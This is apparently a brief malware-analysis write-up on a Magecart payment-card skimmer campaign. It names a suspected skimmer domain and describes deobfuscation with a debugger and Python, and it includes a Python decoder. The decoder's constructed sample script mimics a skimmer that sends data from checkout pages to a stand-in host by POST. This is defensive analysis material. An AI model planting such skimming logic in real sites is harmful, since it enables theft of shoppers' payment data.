Magecart Skimmer Analysis: From One Tweet to a Campaign.
Recent investigations into Magecart campaigns have revealed a sophisticated approach to malicious JavaScript injection aimed at skimming payment data from compromised ecommerce websites. The analysis began with an initial observation from a single tweet referencing the potential involvement of a Magecart-style operation specifically targeting http://cc-analytics.com. This prompted further inquiry into the methods used by threat actors.
Deobfuscating the malicious scripts was key to understanding the attack technique. Analysts prefixed the script with "debugger;" and executed it in browser developer tools. They also used Python to decode the obfuscated strings, which were written with hexadecimal values and \x escape sequences; decoding them simplified the extraction of relevant content.
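The Python decoding step described above, sketched as an added example (not the analysts' own script): it rewrites `\xNN`/`\uNNNN` string escapes and hexadecimal integer literals into readable form and lists the decoded strings that look like network endpoints. The sample script, its `cdn.example.test` URL and all function names are constructed for illustration.

```python
import re

# Constructed sample in the style described above (not the real skimmer):
# strings hidden as \x escapes, indexes written as hexadecimal literals.
SAMPLE_JS = r"""
var _0x3a1f=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x64\x6e\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x74\x65\x73\x74\x2f\x69',
"\x63\x68\x65\x63\x6b\x6f\x75\x74",'\x50\x4f\x53\x54'];
if(location.href.indexOf(_0x3a1f[0x1])>-0x1){send(_0x3a1f[0x0],_0x3a1f[0x2]);}
"""

# One pass over the source: a quoted string literal, or a bare hex integer.
# Matching strings first keeps "0x10" inside a string from being rewritten.
TOKEN = re.compile(
    r"""(?P<q>['"])(?P<body>(?:\\.|(?!(?P=q))[^\\])*)(?P=q)"""
    r"""|\b0x(?P<hex>[0-9a-fA-F]+)\b""", re.S)
# Any backslash escape; only \xNN and \uNNNN carry a code point to decode.
ESCAPE = re.compile(r"\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|.)", re.S)

def _decode_body(body, quote):
    """Decode \\xNN and \\uNNNN inside one string literal's body."""
    def one(m):
        code = m.group(1) or m.group(2)
        if code is None:              # \n, \\, \' and similar stay as written
            return m.group(0)
        ch = chr(int(code, 16))
        # Keep the escape if decoding would break the literal or hide a control char.
        ok = ch.isprintable() and ch not in (quote, "\\")
        return ch if ok else m.group(0)
    return ESCAPE.sub(one, body)

def deobfuscate(js):
    """Return the script with string escapes decoded and hex integers in decimal."""
    def fix(m):
        if m.group("hex") is not None:
            return str(int(m.group("hex"), 16))
        q = m.group("q")
        return q + _decode_body(m.group("body"), q) + q
    return TOKEN.sub(fix, js)

def decoded_strings(js):
    """Decoded value of every string literal, in source order."""
    return [_decode_body(m.group("body"), m.group("q"))
            for m in TOKEN.finditer(js) if m.group("q")]

def network_strings(js):
    """Decoded strings that start like a URL: candidates for review."""
    return [s for s in decoded_strings(js) if re.match(r"(?i)https?://|wss?://", s)]

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
    print(network_strings(SAMPLE_JS))
```

The tokenizer is regex-based and does not understand JavaScript comments or regex literals, so treat its output as a reading aid and confirm findings in the debugger.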